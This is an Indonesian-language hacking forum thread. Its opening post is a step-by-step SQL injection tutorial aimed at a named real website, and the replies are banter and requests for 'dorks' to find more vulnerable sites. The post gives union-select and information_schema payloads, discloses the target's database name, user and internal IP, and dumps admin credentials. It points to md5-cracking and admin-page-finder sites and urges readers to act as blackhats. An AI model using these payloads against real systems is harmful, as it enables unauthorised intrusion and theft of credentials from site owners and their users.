Advance SQL Injection + Live Demo By Edelweize

waduuhhh,,, newbie mauu share nihh.......

jangan di ejek yah kalo salah........ maklum kerjaan newbie.....

guaa langsung kasih live demonya,, guaa gakk mauu jelasin.... capekk dahh.......

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Aurthor : Edelweize a.k.a Rue a.k.a Advance SQL Injector
Method : Advance SQL Injection
Vuln URL : http://hrtemps.org/productInfo.php?productID=115%27
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

1.a Vuln Checking

dengan menambahkan tanda ' [aphostrophie] di akhir URL

Picture Live Demo 1.a Vuln Checking

1.b Vuln Checking [ True And False ]

yaitu dengan +and+1=1 << true, +and+1=2 << false

kalo true,, artikel / produk / apalah,, akan keliatan,, tapi kalo false,, artikel / produk / apalah,, gag akan keliatan.....

Picture Live Demo 1.b Vuln Checking [True]

Picture Live Demo 1.b.a Vuln Checking [ False]

2. Penghitungan Collumn

disini setelah menemukan vulnerebalities di website dan melakukan checking Vuln,, selanjutnya kita akan melakukan Penghitungan Collumn yang gunannya untuk melihat berapa column yang ada di site tsb...

+order+by+[nomer]+--+

skarang guaa kasih contohnya langsung aja yahh.... capekk dahh tinggal di aplod melulu picturenya..

Penghitungan Collumn 1

gag ada errornya tuhh.....

Penghitungan Collumn 2

gag ada juga......

Penghitungan Collumn 3

wadduuhh gag ada juga,....... carii truzz......
langsung jumping aja dahh,, capek.....

Penghitungan Collumn 20

wiw,, ada errornya....
tapii belom pasti kalo disitu...

Penghitungan Collumn 19

errornya ada juga.....

Penghitungan Collumn 18

wiw,, gag ada errornya....
hore ketemu columnnya ....

jadi columnya ada 18 karna errornya pas di 19......

lannjootttt dahh...............


3. Menemukan Vulnerabilities Collumn

disini kita akan mempelajari gimana cara menemukan vulnerabilitie column....
kan pada tahap 2 tadi kita udh menemukan berapa jumlah column yg ada di site itu....
skarang coba dahh kita testing di tabel tsb kalo ada vulnnya....

kata kunci : +union+select+[nomer column]+--+

Live Demo Collumn Vulnerabilities Checking 18

wew....
ada vulnnya.........

ada angka 3 yang nongol.....
skarang udh dape lubang nya dahh.....

lanjootttt.....................

4. Pengecekan Version, User, Ama Database Website......

setelah mendapatkan vuln column dan angkanya yang nongol.....
skarang kita melakukan checking versi MySQL, user, dan database yang dipakai......

kata kunci : concat(database(),0x3a,user(),0x3a,version())

Q : cara penempatannya gimana..??
A : nih liat,, punya mata kan......

Live Demo Database, User, Version Checking.

database : mbstech_newstore
user : mbstech_mbstech@172.20.10.17
version : 5.0.84-percona-b18-log

nahh,, skarang kan udh dapet versi database ama usernya....
nttuu,, MySQLnya versi 5....
berarti gampang dong nginjeknya.... hehehehhee
kalo versi 4 lebih menjurus pada penebakan.. tapi karna target live demonya berversi 5 jadi belum bisa dijelasin,, pokoknya nanti dahh guaa jelasin kalo ada waktu.....

5. Looking For Table Names, Check This Out..!!

setelah dapetin versi mysqlnya [5] skarng kita akan ingin melihat nama2 tabelnya trus melakukan dumping uname ama passwordnya...... hehehehehe

kata kunci 1 : group_concat(table_name)]
kata kunci 2 : +from+information_schema.tables+--+

tauu cara penempatannya..??
nihh....

Table Names Searching

waduuhh banyak amat......

mari kita sedikitkan...... hehehehe......

kata kunci 3 : sama kek kata kunci 1
kata kunci 4 : +from+information_schema.tables+where+table_schema<>0x696e666f726d6174696f6e5f736368656d61+--+

gunanya kata kunci 4 itu untuk mengeluarkan nama2 tabel tanpa memuat tabel informasi....
jadi kita lebih leluasa melihat nama tabel yang mangandung admin....

lanjut....

6. Mengeluarkan Nama Collumn Dari Table

nahh,, setelah kita melihat nama table yang dicurigai mencuri [lho kok mencuri] ekh salah,, mengandung admin.....

kita akan melihat isi collumn tsb utk memastikan bahwa tabel tersebut memang mengandung admin...

kata kunci 1 : group_concat(column_name)
kata kunci 2 : +from+information_schema.columns+where+table_name=0xHEXdariNAMATABEL+--+

skarang sebelum menginject, kita udh menemukan tabel yg keknya mengandung admin....
'admin' (wew.. emang mengandung admin,, namanya aja udh kek gitu)

lalu kata admin kita convert menjadi hex di website ascii converter online ataupun software...

nahh,, ini ascii converter dari t0k3k Miring Crew Forum..

- = [ASCII CONVERTER By Edelweize] = -

selama guaa tauu hex dari admin sih 41646d696e

tapi cobalah test dolo,, mungkin guaa salah kali yah..... hehehehe

7. mengeluarkan isi column

nahh ....
udah mauu abis nihh.........

skarang setelah melihat nama column dari table, kita akan mengeluarkan isi column untuk melihat (biasanya sih uname ama pass admin)

langsung aja
kata kunci 1 : concat_ws([isi column])
kata kunci 2 : +from+[namacolumn]+--+

Live Demo Mengeluarkan Isi Column

tuuhh...!!
kalo udah keluar skarang...
kita mengcrack passwordnya.... kenapa..?? karna password itu masih dalam keadaan encrypted...

skarang mari mengcrack.....
ini situs2 yang menyediakan fasilitas crack md5...
http://md5crack.com/
http://www.victorike.com/tools/

8. Mencari Halaman Login Admin

naahh.....
setelah md5 hash telah kita crack sekarang kita harus menemukan halaman login adminnya.....

kalo saya sihh sering pake situs ini untuk nyari halaman login admin...
http://mormoroth.net/af/

9. Apakah Yang Akan Dilakukan Selanjutnya...??

iyaaaa.....

setelah menemukan uname ama pass juga admin loginnya,.....
kita tinggal login trus melakukan apa yang harus blackhat lakukan......
(untung guaa ngga kek mereka, guaa kan newbie... )

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
End Of Archive
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

btw, yang live demo tadi lohh......
username : admin
password : admin
halaman login admin : carii sendiriii.....!!! sdangkan guaa aja gag nemu......

selamat bekerja....


Regards,

edelweize

Nga Ngerti

wkwkwkwk

bisa ngerti kalo disimak baek2 gan......

maklum ane juga masih newbie,, jadi ngga ngerti2 amat.....

iya gw ga ngerti Edwar,,,,,,,,,,,,,,,,

wakwakwkawkakwka..........

astaga V.I.P nya mana brijer??????

@^

tggu kita mo tanya dulu depe admin satu.....

bersabar neh...

btw, jang double post,cukup nn edit jo ngana pe post pertama kong kase gabung tu apa yang ngana mo tulis.. ok.....


Regards,

edelweize

waduh masternya sedang berbicara .. ane gak ikutan ..
gak ngerti soalnya masalah ginian ..

^

ane bukan master gann.......

ane masih newbie.... pengen jadi master tapi ngga kesampean....

ada yang mauu ajarin gag...??

huahahaha...dasar bhs pemograman aja blm ngerti gwe

....
belajar dulu lah yang ginian..
ga ngerti gua..

hahhaha.... si sql injection lg...

sep dah nice post gan...

@om performa1233
koq pake foto yang ada tulisan hacker...
berarti hacker yah???
kalo gitu harus nya ngerti..
soalnya kata yang buad thread ini masih yang mudah...

sebener nya sih gw juga bingung..
panjang amitt tutor nya...

---
barusan gw googling, nemu ini..
http://t35.com/latihan/

sama ngga kk??

lagi donk kk penjelasan nya..
masih bingung nii..

minta ym , biar mudah nanya nya,...

thx...

wah ada anak PHL maen maen kesini ..

waahhh nice post ne kk,,tapi bingung ne mulainya dari mana,,buat nyari yang error tu mesti nyari satu per satu y kk??ingung ne,,butuh ngluangin waktu buat belajar memahami ini ...

@tryer

hahahahhaha

bang ntong rendahin diri nehh.........

cuman itu teknik advance guaa bang.....

maklum super newbie.....

@psikotropika (bener apa kagak yah,, wakkakkka) kidding

diaa juga tergantung dorknya gann....

kalo dork masuk dihati,, pasti bisa dapet yang banyak..........


---

Regards,

edelweize

berarti mesti nyari2 dork dulu ya kk??soalnya dork2 yang biasa dishare udah diselesein sama master2 semua,,ada saran kira2 dork yang banyak dijumpai webnya mengandung banyak bug kk?? maap kk klo banyak tanya soalnya g paham apa2 ne kk??

sama satu lagi kk ,klo nyari ada errornya g buat web yang enginenya wordpress trus permalink'nya pakai /dd/mm/yyyy/%post% tu gmn ya kk??
semoga g kelihatan konyol

wahhh.......

kalo wordpress mahh ane gag pernah belajar hole nya gann..........

mungkin yang post dibawah anee bisa menjawab.......


Regards,

edelweize the warlock

Pramuda wrote:

wah ada anak PHL maen maen kesini ..

edelweize wrote:

@tryer
hahahahhaha
bang ntong rendahin diri nehh.........
cuman itu teknik advance guaa bang.....
maklum super newbie.....

---

Regards,

edelweize

lu berdua main-main ah...
kan gw masi belajar ama lu pada....

gw kurang ngerti jga......................

hehehehehehehe

tryer wrote:

Pramuda wrote:

wah ada anak PHL maen maen kesini ..

edelweize wrote:

@tryer
hahahahhaha
bang ntong rendahin diri nehh.........
cuman itu teknik advance guaa bang.....
maklum super newbie.....

---

Regards,

edelweize

lu berdua main-main ah...
kan gw masi belajar ama lu pada....

wkwkwkwkwkwkwk.........

saling share disini aja bang..............
sama2 belajar.,......

nah ini gw lebih ngga ngerti paan maksud nya...

peforma1233 wrote:

gw kurang ngerti jga......................

hehehehehehehe

padahal dengan bangga dia memasang avatar bertuliskan : " Hakcer"

T T

waw............

@tryer

iyee tuuhh,,guaa juga gag ngerti dahh,, masak sqli aja gag tauu.........

remove tuhh avatarnya,, ganti avatar bertuliskan "penari"

wkwkwkwkwkwkwkwk

kabooorrr akhh...........

huhu...
bener juga..
tpi napa mesti penari??

wkwkwkwkwkwk

gag tauu juga...........

gag nyambung mode : ON

wkwkwkwkwk